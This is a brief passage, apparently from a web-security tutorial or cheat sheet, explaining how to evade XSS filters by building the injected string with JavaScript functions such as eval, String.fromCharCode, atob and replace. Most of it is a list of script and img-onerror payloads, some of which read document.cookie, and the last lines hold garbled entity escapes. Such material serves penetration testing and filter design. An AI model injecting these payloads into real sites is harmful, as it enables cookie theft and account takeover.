One trick, for bypassing more advanced filters, is using JavaScript functions, to generate the malicious string to inject in the parameter. To do that, it is possible to use the eval() and replace() functions:

    <script>eval('al'+'ert(1)');</script>
    <script>eval(String.fromCharCode(97,108,101,114,116,40,49,41));
    </script>
    <script>eval(atob('amF2YXNjcmlwdDphbGVydCgxKQ'));</script>
    <script>'alert(1)'.replace(/.+/,eval)</script>
    <script>function::['alert'](1)</script>
    <script>alert(document['cookie'])</script>
    <script>with(document)alert(cookie)</script>
    <img onerror=eval('alu0065rt(1)') src=a>
    <img onerror=eval('alu0065rt(1&amp;amp;amp;
    #x29;') src=a>